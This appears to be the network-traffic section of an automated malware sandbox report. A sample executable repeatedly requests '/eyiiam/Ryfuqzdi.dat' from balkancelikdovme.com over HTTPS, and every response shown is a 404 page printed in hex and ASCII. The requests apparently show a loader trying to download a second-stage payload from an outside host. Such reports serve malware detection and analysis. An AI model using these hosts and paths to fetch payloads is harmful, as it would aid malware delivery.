      2025-01-10 22:04:49 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.449731185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:04:50 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:04:50 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:04:50 GMT
      vary: User-Agent
      2025-01-10 22:04:50 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      2192.168.2.449732185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:04:51 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:04:51 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:04:51 GMT
      vary: User-Agent
      2025-01-10 22:04:51 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      3192.168.2.449733185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:04:52 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:04:52 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:04:52 GMT
      vary: User-Agent
      2025-01-10 22:04:52 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      4192.168.2.449734185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:04:53 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:04:53 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:04:53 GMT
      vary: User-Agent
      2025-01-10 22:04:53 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      5192.168.2.449735185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:04:54 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:04:54 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:04:54 GMT
      vary: User-Agent
      2025-01-10 22:04:54 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      6192.168.2.449736185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:04:55 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:04:55 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:04:55 GMT
      vary: User-Agent
      2025-01-10 22:04:55 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      7192.168.2.449737185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:04:56 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:04:56 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:04:56 GMT
      vary: User-Agent
      2025-01-10 22:04:56 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      8192.168.2.449738185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:04:56 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:04:57 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:04:57 GMT
      vary: User-Agent
      2025-01-10 22:04:57 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      9192.168.2.449739185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:04:57 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:04:58 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:04:58 GMT
      vary: User-Agent
      2025-01-10 22:04:58 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      10192.168.2.449740185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:04:58 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:04:59 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:04:58 GMT
      vary: User-Agent
      2025-01-10 22:04:59 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      11192.168.2.449741185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:04:59 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:04:59 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:04:59 GMT
      vary: User-Agent
      2025-01-10 22:04:59 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      12192.168.2.449742185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:00 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:00 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:00 GMT
      vary: User-Agent
      2025-01-10 22:05:00 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      13192.168.2.449743185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:01 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:01 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:01 GMT
      vary: User-Agent
      2025-01-10 22:05:01 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      14192.168.2.449744185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:02 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:02 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:02 GMT
      vary: User-Agent
